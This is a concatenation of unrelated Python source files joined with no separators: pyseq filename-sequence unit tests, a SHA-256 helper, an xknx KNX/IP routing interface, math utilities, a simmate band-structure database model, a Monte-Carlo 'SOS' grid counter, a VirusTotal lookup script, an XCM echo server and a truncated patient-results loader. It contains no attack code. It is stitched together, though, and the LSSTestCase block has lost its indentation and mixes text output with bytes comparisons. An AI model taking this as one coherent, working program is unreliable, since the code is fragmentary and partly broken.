        self.assertEqual(len(s), 2)
        self.assertEqual(s[0], s[0])
        self.assertEqual(s[1], Item("file.02.ext"))

        s = Sequence(["file.01.ext"])
        s += ["file.02.ext"]
        self.assertEqual(len(s), 2)
        self.assertEqual(s[0], s[0])
        self.assertEqual(s[1], Item("file.02.ext"))

        s = Sequence(["file.01.ext"])
        s += Sequence(["file.02.ext"])
        self.assertEqual(len(s), 2)
        self.assertEqual(s[0], s[0])
        self.assertEqual(s[1], Item("file.02.ext"))

    def test___setslice___(self):
        """slice assignment accepts a name, Item, list or Sequence; a
        non-member raises SequenceError"""
        s = Sequence(["file.001.ext"])
        s[1:2] = "file.002.ext"
        self.assertEqual(len(s), 2)
        self.assertEqual(s[0], Item("file.001.ext"))
        self.assertEqual(s[1], Item("file.002.ext"))

        s = Sequence(["file.001.ext"])
        s[1:2] = Item("file.002.ext")
        self.assertEqual(len(s), 2)
        self.assertEqual(s[0], Item("file.001.ext"))
        self.assertEqual(s[1], Item("file.002.ext"))

        s = Sequence(["file.001.ext"])
        s[1:2] = [Item("file.002.ext")]
        self.assertEqual(len(s), 2)
        self.assertEqual(s[0], Item("file.001.ext"))
        self.assertEqual(s[1], Item("file.002.ext"))

        s = Sequence(["file.001.ext"])
        s[1:2] = Sequence([Item("file.002.ext")])
        self.assertEqual(len(s), 2)
        self.assertEqual(s[0], Item("file.001.ext"))
        self.assertEqual(s[1], Item("file.002.ext"))

        self.assertRaises(SequenceError, s.__setslice__, 1, 2, 'item.001.ext')

    def test_insert(self):
        """inserting a member name works; a non-member raises SequenceError"""
        s = Sequence(["file.001.ext"])
        s.insert(0, "file.002.ext")
        self.assertEqual(len(s), 2)
        self.assertEqual(s[0], Item("file.002.ext"))
        self.assertEqual(s[1], Item("file.001.ext"))
        self.assertRaises(SequenceError, s.insert, 1, "item")

    def test_extend(self):
        """extending with member names works; a non-member raises"""
        s = Sequence(["file.001.ext"])
        s.extend(["file.002.ext", "file.003.ext"])
        self.assertEqual(len(s), 3)
        self.assertEqual(s[0], Item("file.001.ext"))
        self.assertEqual(s[1], Item("file.002.ext"))
        self.assertEqual(s[2], Item("file.003.ext"))
        self.assertRaises(SequenceError, s.extend, ["item"])

    def test_includes_is_working_properly(self):
        """testing if Sequence.includes() method is working properly
        """
        seq = Sequence(self.files)
        self.assertTrue(seq.includes('file.0009.jpg'))
        self.assertFalse(seq.includes('file.0009.pic'))

    def test_contains_is_working_properly(self):
        """testing if Sequence.contains() method is working properly
        """
        seq = Sequence(self.files)
        self.assertFalse(seq.contains('file.0009.jpg'))
        self.assertFalse(seq.contains('file.0009.pic'))

    def test_format_is_working_properly_1(self):
        """testing if format is working properly
        """
        seq = Sequence(self.files)
        seq.append('file.0006.jpg')
        self.assertEqual(
            seq.format('%h%p%t %r (%R)'),
            'file.%04d.jpg 1-6 ([1-3, 6])'
        )

    def test_format_is_working_properly_2(self):
        """testing if format is working properly
        """
        seq = Sequence(self.files)
        seq.append('file.0006.jpg')
        self.assertEqual(
            'file.0001-0006.jpg',
            seq.format('%h%04s-%04e%t'),
        )
        self.assertEqual(
            'file.   1-   6.jpg',
            seq.format('%h%4s-%4e%t'),
        )

    def test_format_is_working_properly_3(self):
        """testing if format is working properly
        """
        seq = Sequence(self.files)
        seq.append('file.0006.jpg')
        seq.append('file.0010.jpg')
        self.assertEqual(
            seq.format('%h%p%t %r (missing %M)'),
            'file.%04d.jpg 1-10 (missing [4-5, 7-9])'
        )

    def test_format_directory_attribute(self):
        """the %D directive expands to the sequence's directory with a
        trailing separator"""
        dir_name = os.path.dirname(
            os.path.abspath(self.files[0])) + os.sep
        seq = Sequence(self.files)
        self.assertEqual(
            seq.format("%D"),
            dir_name
        )

    def test__get_missing(self):
        """ test that _get_missing works
        """
        # Can't initialize Sequence without an item
        # seq = Sequence([])
        # self.assertEqual(seq._get_missing(), [])
        seq = Sequence(["file.00010.jpg"])
        self.assertEqual(seq._get_missing(), [])

        seq = Sequence(self.files)
        seq.append("file.0006.jpg")
        self.assertEqual(seq._get_missing(), [4, 5])

        # range() replaces the Python-2-only xrange(), which raises NameError
        # on Python 3.
        seq = Sequence(["file.%04d.jpg" % i for i in range(20)])
        seq.pop(10)
        seq.pop(10)
        seq.pop(10)
        seq.pop(14)
        seq.pop(14)
        missing = [10, 11, 12, 17, 18]
        self.assertEqual(seq._get_missing(), missing)

        missing = []
        seq = Sequence(["file.0001.jpg"])
        for i in range(2, 50):
            if random.randint(0, 1) == 1:
                seq.append("file.%04d.jpg" % i)
            else:
                missing.append(i)
        # remove ending random frames; the `missing and` guard protects the
        # (unlikely) case where no frame past 0001 was appended or skipped
        while missing and missing[-1] > int(re.search(r"file\.(\d{4})\.jpg", seq[-1]).group(1)):
            missing.pop(-1)
        self.assertEqual(seq._get_missing(), missing)
class HelperFunctionsTestCase(unittest.TestCase):
    """tests the helper functions like
    pyseq.diff()
    pyseq.uncompress()
    pyseq.get_sequences()
    """

    def test_diff_is_working_properly_1(self):
        """testing if diff is working properly
        """
        self.assertEqual(
            diff('file01_0040.rgb', 'file01_0041.rgb'),
            [{'frames': ('0040', '0041'), 'start': 7, 'end': 11}]
        )

    def test_diff_is_working_properly_2(self):
        """testing if diff is working properly
        """
        self.assertEqual(
            diff('file3.03.rgb', 'file4.03.rgb'),
            [{'frames': ('3', '4'), 'start': 4, 'end': 5}]
        )

    def test_uncompress_is_working_properly_1(self):
        """testing if uncompress is working properly
        """
        seq = uncompress(
            './tests/files/012_vb_110_v001.%04d.png 1-10',
            fmt='%h%p%t %r'
        )
        self.assertEqual(
            '012_vb_110_v001.1-10.png',
            str(seq)
        )

        self.assertEqual(10, len(seq))

    def test_uncompress_is_working_properly_2(self):
        """testing if uncompress is working properly
        """
        seq2 = uncompress(
            './tests/files/a.%03d.tga [1-3, 10, 12-14]',
            fmt='%h%p%t %R'
        )
        self.assertEqual(
            'a.1-14.tga',
            str(seq2)
        )

        self.assertEqual(
            7,
            len(seq2)
        )

    def test_uncompress_is_working_properly_3(self):
        """testing if uncompress is working properly
        """
        seq3 = uncompress(
            'a.%03d.tga 1-14 ([1-3, 10, 12-14])',
            fmt='%h%p%t %r (%R)'
        )
        self.assertEqual(
            'a.1-14.tga',
            str(seq3)
        )

        self.assertEqual(
            7,
            len(seq3)
        )

    def test_uncompress_is_working_properly_4(self):
        """testing if uncompress is working properly
        """
        seq4 = uncompress(
            'a.%03d.tga 1-14 ([1-3, 10, 12-14])',
            fmt='%h%p%t %s-%e (%R)'
        )
        self.assertEqual(
            'a.1-14.tga',
            str(seq4)
        )

    def test_uncompress_is_working_properly_5(self):
        """testing if uncompress is working properly
        """
        seq5 = uncompress('a.%03d.tga 1-14 [1-14]', fmt='%h%p%t %r %R')
        self.assertEqual(
            'a.1-14.tga',
            str(seq5)
        )

        self.assertEqual(
            14,
            len(seq5)
        )

    def test_uncompress_is_working_properly_6(self):
        """testing if uncompress is working properly
        """
        seq6 = uncompress('a.%03d.tga 1-14 ([1-14])', fmt='%h%p%t %r (%R)')
        self.assertEqual(
            'a.1-14.tga',
            str(seq6)
        )

        self.assertEqual(
            14,
            len(seq6)
        )

    def test_uncompress_is_working_properly_7(self):
        """testing if uncompress is working properly
        """
        seq7 = uncompress(
            'a.%03d.tga 1-100000 ([1-10, 100000])',
            fmt='%h%p%t %r (%R)'
        )
        self.assertEqual(
            'a.1-100000.tga',
            str(seq7)
        )

        self.assertEqual(
            11,
            len(seq7)
        )

    def test_uncompress_is_working_properly_8(self):
        """testing if uncompress is working properly
        """
        # %m lists *missing* frames, so 100 - 4 = 96 actual members
        seq8 = uncompress(
            'a.%03d.tga 1-100 ([10, 20, 40, 50])',
            fmt='%h%p%t %r (%m)'
        )
        self.assertEqual(
            'a.1-100.tga',
            str(seq8)
        )

        self.assertEqual(
            96,
            len(seq8)
        )

    def test_get_sequences_is_working_properly_1(self):
        """testing if get_sequences is working properly
        """
        # NOTE(review): this path is relative to the current working
        # directory ('./files/'), while other tests use './tests/files/' —
        # confirm the directory the suite is intended to be run from.
        seqs = get_sequences('./files/')

        expected_results = [
            '012_vb_110_v001.1-10.png',
            '012_vb_110_v002.1-10.png',
            'a.1-14.tga',
            'alpha.txt',
            'bnc01_TinkSO_tx_0_ty_0.101-105.tif',
            'bnc01_TinkSO_tx_0_ty_1.101-105.tif',
            'bnc01_TinkSO_tx_1_ty_0.101-105.tif',
            'bnc01_TinkSO_tx_1_ty_1.101-105.tif',
            'file.1-2.tif',
            'file.info.03.rgb',
            'file01.1-4.j2k',
            'file01_40-43.rgb',
            'file02_44-47.rgb',
            'file1-4.03.rgb',
            'fileA.1-3.jpg',
            'fileA.1-3.png',
            'file_02.tif',
            'z1_001_v1.1-4.png',
            'z1_002_v1.1-4.png',
            'z1_002_v2.1-4.png',
        ]

        for seq, expected_result in zip(seqs, expected_results):
            self.assertEqual(
                expected_result,
                str(seq)
            )

    def test_get_sequences_is_working_properly_2(self):
        """testing if get_sequences is working properly
        """
        seqs = get_sequences(['fileA.1.rgb', 'fileA.2.rgb', 'fileB.1.rgb'])

        expected_results = [
            'fileA.1-2.rgb',
            'fileB.1.rgb'
        ]

        for seq, expected_result in zip(seqs, expected_results):
            self.assertEqual(
                expected_result,
                str(seq)
            )

    def test_get_sequences_is_working_properly_3(self):
        """testing if get_sequences is working properly
        """
        # glob pattern input, again relative to the current working directory
        seqs = get_sequences('./tests/files/bnc*')

        expected_results = [
            'bnc01_TinkSO_tx_0_ty_0.%04d.tif 101-105',
            'bnc01_TinkSO_tx_0_ty_1.%04d.tif 101-105',
            'bnc01_TinkSO_tx_1_ty_0.%04d.tif 101-105',
            'bnc01_TinkSO_tx_1_ty_1.%04d.tif 101-105',
        ]

        for seq, expected_result in zip(seqs, expected_results):
            self.assertEqual(
                expected_result,
                seq.format('%h%p%t %r')
            )
class LSSTestCase(unittest.TestCase):
"""Tests lss command
"""
def run_command(self, *args):
"""a simple wrapper for subprocess.Popen
"""
process = subprocess.Popen(args, stdout=subprocess.PIPE, universal_newlines=True)
# loop until process finishes and capture stderr output
stdout_buffer = []
while True:
stdout = process.stdout.readline()
if stdout == b'' and process.poll() is not None:
break
if stdout != b'':
stdout_buffer.append(stdout)
# flatten the buffer
return b''.join(stdout_buffer)
def setUp(self):
"""
"""
self.here = os.path.dirname(__file__)
self.lss = os.path.realpath(os.path.join(os.path.dirname(self.here), 'lss'))
def test_lss_is_working_properly_1(self):
"""testing if the lss command is working properly
"""
test_files = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"files"
)
result = self.run_command(
self.lss,
test_files
)
self.assertEqual(""" 10 012_vb_110_v001.%04d.png [1-10]
10 012_vb_110_v002.%04d.png [1-10]
7 a.%03d.tga [1-3, 10, 12-14]
1 alpha.txt
5 bnc01_TinkSO_tx_0_ty_0.%04d.tif [101-105]
5 bnc01_TinkSO_tx_0_ty_1.%04d.tif [101-105]
5 bnc01_TinkSO_tx_1_ty_0.%04d.tif [101-105]
5 bnc01_TinkSO_tx_1_ty_1.%04d.tif [101-105]
2 file.%02d.tif [1-2]
1 file.info.03.rgb
3 file01.%03d.j2k [1-2, 4]
4 file01_%04d.rgb [40-43]
4 file02_%04d.rgb [44-47]
4 file%d.03.rgb [1-4]
3 fileA.%04d.jpg [1-3]
3 fileA.%04d.png [1-3]
1 file_02.tif
4 z1_001_v1.%d.png [1-4]
4 z1_002_v1.%d.png [1-4]
4 z1_002_v2.%d.png [1-4]
""",
result
)
if __name__ == '__main__':
    # Run every TestCase in this module via the unittest CLI runner.
    unittest.main()
# Simple Wallet
# Copyright (c) 2022 Mystic Technology LLC
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
from typing import Union
from ..utils.conversion import to_bytes
class Sha256:
    """Thin wrapper around hashlib's SHA-256 with single and double hashing."""

    @classmethod
    def hash(cls, x: Union[bytes, str]) -> bytes:
        """Return the 32-byte SHA-256 digest of `x`.

        `str` input is encoded to bytes as UTF-8 first (via to_bytes).
        """
        # First parameter renamed self -> cls: these are classmethods, so the
        # implicit first argument is the class, not an instance.
        x = to_bytes(x, 'utf8')
        # digest() already returns bytes; the previous bytes(...) wrapper was
        # a redundant copy.
        return hashlib.sha256(x).digest()

    @classmethod
    def hashd(cls, x: Union[bytes, str]) -> bytes:
        """Return the double SHA-256 digest of `x`: sha256(sha256(x))."""
        x = to_bytes(x, 'utf8')
        return cls.hash(cls.hash(x))
"""
Abstraction for handling KNX/IP routing.
Routing uses UDP Multicast to broadcast and receive KNX/IP messages.
"""
from __future__ import annotations
import logging
from typing import TYPE_CHECKING, Callable
from xknx.knxip import (
CEMIFrame,
CEMIMessageCode,
KNXIPFrame,
KNXIPServiceType,
RoutingIndication,
)
from xknx.telegram import TelegramDirection
from .interface import Interface
from .udp_client import UDPClient
if TYPE_CHECKING:
from xknx.telegram import Telegram
from xknx.xknx import XKNX
TelegramCallbackType = Callable[[Telegram], None]
logger = logging.getLogger("xknx.log")
class Routing(Interface):
    """KNX/IP routing interface: broadcasts and receives frames via UDP multicast."""

    def __init__(
        self,
        xknx: XKNX,
        telegram_received_callback: TelegramCallbackType,
        local_ip: str,
    ):
        """Set up the multicast transport and subscribe to routing indications."""
        self.xknx = xknx
        self.telegram_received_callback = telegram_received_callback
        self.local_ip = local_ip
        # Multicast UDP transport bound to an ephemeral local port.
        self.udpclient = UDPClient(
            self.xknx,
            (local_ip, 0),
            (self.xknx.multicast_group, self.xknx.multicast_port),
            multicast=True,
        )
        # Only ROUTING_INDICATION frames matter for routing.
        self.udpclient.register_callback(
            self.response_rec_callback, [KNXIPServiceType.ROUTING_INDICATION]
        )

    def response_rec_callback(self, knxipframe: KNXIPFrame, _: UDPClient) -> None:
        """Verify and handle knxipframe. Callback from internal udpclient."""
        body = knxipframe.body
        if not isinstance(body, RoutingIndication):
            logger.warning("Service type not implemented: %s", knxipframe)
            return
        if body.cemi is None:
            # unsupported CEMI frame - drop silently
            return
        if body.cemi.src_addr == self.xknx.own_address:
            logger.debug("Ignoring own packet")
            return
        incoming = body.cemi.telegram
        incoming.direction = TelegramDirection.INCOMING
        if self.telegram_received_callback is not None:
            self.telegram_received_callback(incoming)

    async def send_telegram(self, telegram: "Telegram") -> None:
        """Wrap *telegram* in a RoutingIndication and broadcast it."""
        cemi = CEMIFrame.init_from_telegram(
            self.xknx,
            telegram=telegram,
            code=CEMIMessageCode.L_DATA_IND,
            src_addr=self.xknx.own_address,
        )
        indication = RoutingIndication(self.xknx, cemi=cemi)
        await self.send_knxipframe(KNXIPFrame.init_from_body(indication))

    async def send_knxipframe(self, knxipframe: KNXIPFrame) -> None:
        """Send a raw KNXIPFrame over the multicast transport."""
        self.udpclient.send(knxipframe)

    async def connect(self) -> bool:
        """Start routing; raises OSError when the network is unreachable."""
        try:
            await self.udpclient.connect()
        except OSError as err:
            logger.debug(
                "Could not establish connection to KNX/IP network. %s: %s",
                type(err).__name__,
                err,
            )
            # close udp client to prevent open file descriptors
            await self.udpclient.stop()
            raise err
        self.xknx.connected.set()
        return True

    async def disconnect(self) -> None:
        """Stop routing and mark the connection as closed."""
        await self.udpclient.stop()
        self.xknx.connected.clear()
|
# random mathy functions
def isPalindrome(s: str) -> bool:
    """Return True if *s* reads the same forwards and backwards."""
    return all(a == b for a, b in zip(s, reversed(s)))
import math
def isPerfectSquare(n: int) -> bool:
    """Return True if *n* is a perfect square (0, 1, 4, 9, ...).

    Fixed: negative inputs previously raised ValueError from math.isqrt;
    a negative integer is never a perfect square, so return False instead.
    """
    if n < 0:
        return False
    return math.isqrt(n) ** 2 == n
# -*- coding: utf-8 -*-
import os
from pymatgen.io.vasp.outputs import Vasprun
from pymatgen.electronic_structure.bandstructure import (
BandStructureSymmLine as ToolkitBandStructure,
)
from pymatgen.electronic_structure.plotter import BSPlotter
from simmate.database.base_data_types import (
table_column,
DatabaseTable,
Calculation,
Structure,
)
class BandStructure(DatabaseTable):
    """
    The electronic band structure holds information about the range of energy
    levels that are available within a material.
    """
    class Meta:
        # Abstract mixin: only materialized through concrete subclasses.
        abstract = True
    # Columns that constitute the minimal ("base") information for this mixin.
    base_info = ["band_structure_data"]
    # kpt_path_type (setyawan_curtarolo, hinuma, latimer_munro)
    # Maybe set as an abstract property?
    band_structure_data = table_column.JSONField(blank=True, null=True)
    """
    A JSON dictionary holding all information for the band structure. This JSON
    is generated using pymatgen's
    `vasprun.get_band_structure(line_mode=True).as_dict()` and is therefore
    currently unoptimized for small storage.
    """
    nbands = table_column.IntegerField(blank=True, null=True)
    """
    The number of bands used in this calculation.
    """
    band_gap = table_column.FloatField(blank=True, null=True)
    """
    The band gap energy in eV.
    """
    is_gap_direct = table_column.BooleanField(blank=True, null=True)
    """
    Whether the band gap is direct or indirect.
    """
    band_gap_direct = table_column.FloatField(blank=True, null=True)
    """
    The direct band gap energy in eV.
    """
    energy_fermi = table_column.FloatField(blank=True, null=True)
    """
    The Fermi energy in eV.
    """
    conduction_band_minimum = table_column.FloatField(blank=True, null=True)
    """
    The conduction band minimum in eV.
    """
    valence_band_maximum = table_column.FloatField(blank=True, null=True)
    """
    The valence band maximum in eV.
    """
    is_metal = table_column.BooleanField(blank=True, null=True)
    """
    Whether the material is a metal.
    """
    # TODO: consider adding...
    # magnetic_ordering (Magnetic ordering of the calculation.)
    # equivalent_labels (Equivalent k-point labels in other k-path conventions)
    @classmethod
    def _from_toolkit(
        cls,
        band_structure: ToolkitBandStructure = None,
        as_dict: bool = False,
    ):
        """
        Build this mixin's column data from a pymatgen BandStructureSymmLine.

        When *band_structure* is None an empty dict/object is produced; when
        *as_dict* is True the column data is returned as a plain dict instead
        of a model instance.
        """
        # Given energy, this function builds the rest of the required fields
        # for this class as an object (or as a dictionary).
        # NOTE(review): get_band_gap() is called twice below; caching the
        # result would avoid recomputation — confirm it is cheap/pure.
        data = (
            dict(
                band_structure_data=band_structure.as_dict(),
                nbands=band_structure.nb_bands,
                band_gap=band_structure.get_band_gap()["energy"],
                is_gap_direct=band_structure.get_band_gap()["direct"],
                band_gap_direct=band_structure.get_direct_band_gap(),
                energy_fermi=band_structure.efermi,
                conduction_band_minimum=band_structure.get_cbm()["energy"],
                valence_band_maximum=band_structure.get_vbm()["energy"],
                is_metal=band_structure.is_metal(),
            )
            if band_structure
            else {}
        )
        # If as_dict is false, we build this into an Object. Otherwise, just
        # return the dictionary
        return data if as_dict else cls(**data)
    def to_toolkit_band_structure(self) -> ToolkitBandStructure:
        """
        Converts this DatabaseTable object into a toolkit BandStructure, which
        has many more methods for plotting and analysis.
        """
        return ToolkitBandStructure.from_dict(self.band_structure_data)
    def get_bandstructure_plot(self):  # -> matplotlib figure
        """
        Plots the band structure using matplotlib
        """
        # NOTE: This method should be moved to a toolkit object
        # DEV NOTE: Pymatgen only implements matplotlib for their band-structures
        # at the moment, but there are two scripts location elsewhere that can
        # outline how this can be done with Plotly:
        # https://plotly.com/python/v3/ipython-notebooks/density-of-states/
        # https://github.com/materialsproject/crystaltoolkit/blob/main/crystal_toolkit/components/bandstructure.py
        bs_plotter = BSPlotter(self.to_toolkit_band_structure())
        plot = bs_plotter.get_plot()
        return plot
class BandStructureCalc(Structure, BandStructure, Calculation):
    """
    Holds Structure, BandStructure, and Calculation information. Band-structure
    workflows are common in materials science, so this table defines the most
    common data that results from such workflow calculations.
    """
    class Meta:
        abstract = True
        app_label = "workflows"
    # Base info is the union of all parent mixins' base columns.
    base_info = Structure.base_info + BandStructure.base_info + Calculation.base_info
    def update_from_vasp_run(
        self,
        vasprun: Vasprun,
        corrections: list,
        directory: str,
    ):
        """
        Given a pymatgen VaspRun object, which is what's typically returned
        from a simmate VaspTask.run() call, this will update the database entry
        with the results.
        """
        # All data analysis is done via a BandStructure object, so we convert
        # the vasprun object to that first.
        band_structure = vasprun.get_band_structure(line_mode=True)
        # Take our band_structure and expand its data for the rest of the columns.
        # NOTE(review): `from_toolkit` (no underscore) is presumably provided by
        # DatabaseTable and dispatches to `_from_toolkit` — confirm it exists.
        new_kwargs = BandStructure.from_toolkit(
            band_structure=band_structure,
            as_dict=True,
        )
        for key, value in new_kwargs.items():
            setattr(self, key, value)
        # lastly, we also want to save the corrections made and directory it ran in
        self.corrections = corrections
        self.directory = directory
        # Now we have the relaxation data all loaded and can save it to the database
        self.save()
    @classmethod
    def from_directory(cls, directory: str):
        """
        Creates a new database entry from a directory that holds band-structure
        results. For now, this assumes the directory holds vasp output files.
        """
        # I assume the directory is from a vasp calculation, but I need to update
        # this when I begin adding new calculators.
        vasprun_filename = os.path.join(directory, "vasprun.xml")
        vasprun = Vasprun(vasprun_filename)
        band_structure = vasprun.get_band_structure(line_mode=True)
        band_structure_db = cls.from_toolkit(
            structure=vasprun.structures[0],
            band_structure=band_structure,
        )
        band_structure_db.save()
        return band_structure_db
|
import random
import math

# Monte-Carlo estimate of the average number of "SOS" patterns in a random
# rectangular grid filled with the letters "s" and "o".

# Read grid dimensions; a square grid is rejected (must be rectangular).
diastaseis = True  # sentinel: keep asking until rows != cols
while diastaseis == True:
    rows = int(input("Mikos?"))
    cols = int(input("Platos?"))
    if rows == cols:
        print("Theloume orthogwnio pinaka kai oxi tetragwno! Ksanaprospathise!")
    else:
        diastaseis = False

# Running totals of "SOS" patterns across all 100 trials.
ori = 0  # horizontal
ka = 0   # vertical
dia = 0  # diagonal (both directions)

for z in range(100):
    # Build a pool holding equal numbers of "s" and "o" to draw from
    # (size rounded up so odd-sized grids are covered).
    misa = math.ceil(rows * cols / 2)
    pinakas_sos = []
    for i in range(misa):
        pinakas_sos.append("s")
        pinakas_sos.append("o")

    # Generate a random cols x rows grid; retry whenever the drawn counts of
    # "o" and "s" come out equal.
    # BUGFIX: the original kept appending new columns to the same `arr` and
    # never reset the o/s counters on a retry, so the retry produced an
    # oversized grid while the counting below still only examined the first
    # `cols` columns (exactly the rejected, balanced ones).  The grid and
    # the counters are now reset on every attempt.
    o = 0
    s = 0
    while o == s:
        arr = []
        o = 0
        s = 0
        for i in range(cols):
            col = []
            for j in range(rows):
                stoixeio = random.choice(pinakas_sos)  # random "s" or "o"
                col.append(stoixeio)
                if stoixeio == "o":
                    o += 1
                elif stoixeio == "s":
                    s += 1
            arr.append(col)

    # Per-trial counters (kept for parity with the original debug prints).
    oriz = 0
    kath = 0
    diag = 0
    for i in range(cols):
        for j in range(rows):
            # Horizontal "SOS" (within one column list, along j).
            if j < rows - 2:
                if arr[i][j] == "s" and arr[i][j + 1] == "o" and arr[i][j + 2] == "s":
                    oriz += 1
                    ori += 1
            # Vertical "SOS" (across columns, along i).
            if i < cols - 2:
                if arr[i][j] == "s" and arr[i + 1][j] == "o" and arr[i + 2][j] == "s":
                    kath += 1
                    ka += 1
            # Diagonal "SOS" going down-right (index guards prevent overrun).
            if cols >= 2 and rows >= 2:
                if (i < cols - 2) and (j < rows - 2):
                    if arr[i][j] == "s" and arr[i + 1][j + 1] == "o" and arr[i + 2][j + 2] == "s":
                        diag += 1
                        dia += 1
            # Diagonal "SOS" going up-right.
            if cols >= 2 and rows >= 2:
                if (j > 1) and (i < cols - 2):
                    if arr[i][j] == "s" and arr[i + 1][j - 1] == "o" and arr[i + 2][j - 2] == "s":
                        diag += 1
                        dia += 1

pl_sos = ori + ka + dia  # total "SOS" patterns over all trials
mo = pl_sos / 100        # average per trial
print("O mesos oros olwn twn sos einai:", mo)
import os, getpass
from decouple import config
from .hashes import *
## querying the virus total using virustotal-search.py and api
def query_virusTotal():
    """Query VirusTotal for the hash of a user-chosen file via virustotal-search.py.

    Prompts for an API key; when left blank, falls back to the `vtkey` value
    from the decouple config.
    """
    import subprocess  # local import: keeps the module-level import block untouched

    ## getting the hash code of the file of choice
    hashcode = get_hashCode()
    path = os.path.dirname(__file__)
    api = input("Whats your API key? ")
    ## validation to check if the key is there
    if(api == ""):
        api = config('vtkey')
    username = getpass.getuser()  # NOTE(review): unused in the original; kept for compatibility
    ## calling the query
    # SECURITY FIX: the original interpolated user input (API key, file-derived
    # hash) into an os.system() shell string, allowing shell injection.
    # Run the helper script without a shell, passing arguments as a list.
    subprocess.run(
        ["python", os.path.join(path, "virustotal-search.py"), "-k", api, "-m", hashcode]
    )
## getting the hashcode using the previous challenge
def get_hashCode():
target_file = input("whats the target file? ")
target_file = os.path.abspath(target_file)
return hash_co(target_file) |
#!/usr/bin/python3
#
# echod.py -- a simple Python-based XCM echo server.
#
# This program is meant as an example how you can use XCM in
# non-blocking mode from Python.
#
import xcm
import sys
import errno
import asyncio
class Client:
    """Handles one accepted XCM connection, echoing each received message back."""

    def __init__(self, event_loop, conn_sock):
        self.conn_sock = conn_sock
        conn_sock.set_target(xcm.SO_RECEIVABLE)
        self.msg = None  # pending message waiting to be echoed back
        self.event_loop = event_loop
        self.event_loop.add_reader(conn_sock, self.activate)

    def activate(self):
        """Progress the connection: send the pending message or receive a new one."""
        try:
            if self.msg:
                self.conn_sock.send(self.msg)
                self.msg = None
            else:
                self.msg = self.conn_sock.receive()
                # a zero-length message signals the peer closed the connection
                if len(self.msg) == 0:
                    self.terminate()
        except xcm.error as e:
            # EAGAIN just means "would block"; any other error is fatal
            if e.errno != errno.EAGAIN:
                self.terminate()
        finally:
            # Fixed idiom: identity comparison with None (was `!= None`).
            if self.conn_sock is not None:
                self.conn_sock.set_target(self.condition())

    def condition(self):
        """Return the XCM condition this client currently waits for."""
        if self.msg:
            return xcm.SO_SENDABLE
        else:
            return xcm.SO_RECEIVABLE

    def terminate(self):
        """Tear down the connection and deregister it from the event loop."""
        self.event_loop.remove_reader(self.conn_sock)
        self.conn_sock.close()
        self.conn_sock = None
class EchoServer:
    """Accepts XCM connections in non-blocking mode, spawning a Client per peer."""

    def __init__(self, event_loop, addr):
        self.event_loop = event_loop
        self.sock = xcm.server(addr, attrs={"xcm.blocking": False})
        self.sock.set_target(xcm.SO_ACCEPTABLE)
        self.event_loop.add_reader(self.sock, self.activate)

    def activate(self):
        """Accept a pending connection; EAGAIN (would-block) is silently ignored."""
        try:
            conn_sock = self.sock.accept(attrs={"xcm.blocking": False})
            Client(self.event_loop, conn_sock)
        except xcm.error as e:
            if e.errno != errno.EAGAIN:
                # Fixed idiom: bare `raise` preserves the original traceback
                # without appending an extra frame (was `raise e`).
                raise
def run(addr):
    """Run the echo server on *addr*, driving it from the asyncio event loop."""
    # NOTE(review): asyncio.get_event_loop() outside a running loop is
    # deprecated since Python 3.10 — consider asyncio.new_event_loop();
    # confirm the targeted Python version.
    event_loop = asyncio.get_event_loop()
    server = EchoServer(event_loop, addr)
    event_loop.run_forever()
# Script entry point: expects exactly one argument, the XCM address to bind.
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("Usage: %s <addr>" % sys.argv[0])
        sys.exit(1)
    run(sys.argv[1])
|
import os
import warnings
from cortstim.edp.loaders.dataset.clinical.excel_meta import ExcelReader
from cortstim.edp.loaders.dataset.result.resultloader import ResultLoader
from cortstim.edp.loaders.patient.subjectbase import SubjectBase
class SubjectResultsLoader(SubjectBase):
    """
    Patient level wrapper for loading in data, or result. It helps
    load in all the datasets for a particular subject, for doing per-subject analysis.
    Assumes directory structure:
    root_dir
    -> name
    -> datasets / result_computes
    """
    def __init__(self, root_dir,
                 subjid=None,
                 datatype='frag',
                 preload=True,
                 use_excel_meta=False):
        # if datatype not in MODELDATATYPES:
        #     raise ValueError("Type of subject loader must be one of {}. You passed in {}!".format(MODELDATATYPES, type))
        super(SubjectResultsLoader, self).__init__(
            root_dir=root_dir, subjid=subjid, datatype=datatype)
        # When True, clinical onset channels are pulled from the excel sheet.
        self.use_excel_meta = use_excel_meta
        # set reference for this recording and jsonfilepath
        self.loadingfunc = ResultLoader
        self.datatype = datatype
        # get a list of all the jsonfilepaths possible
        self._getalljsonfilepaths(self.root_dir, subjid=subjid)
        print("Found {} jsonfilepaths for {}".format(
            len(self.jsonfilepaths), self.subjid))
        if preload:
            self.read_all_files()
    def read_all_files(self):
        """Load every dataset for this subject; skips files with missing data
        or degenerate onset/offset windows. Raises if already loaded."""
        if not self.is_loaded:
            # load in each file / dataset separately
            for idx, json_file in enumerate(self.jsonfilepaths):
                jsonfilepath = os.path.join(self.root_dir, json_file)
                if not os.path.exists(self._get_corresponding_npzfile(jsonfilepath)):
                    print("Data file for {} does not exist!".format(jsonfilepath))
                    continue
                result = self.loadingfunc(results_dir=self.root_dir,
                                          jsonfilepath=jsonfilepath,
                                          datatype=self.datatype,
                                          preload=False)
                resultmodel = result.loadpipeline(jsonfilepath=jsonfilepath)
                if resultmodel.onsetwin == resultmodel.offsetwin:
                    warnings.warn(
                        "Result model onsetwin == offsetwin in {}".format(jsonfilepath))
                    continue
                if self.use_excel_meta:
                    print(
                        "TODO: REFORMAT THIS FUNCTION. Bringing in excel data for onsetchans")
                    resultmodel.clinonsetlabels = self.load_onsetchans_fromexcel(
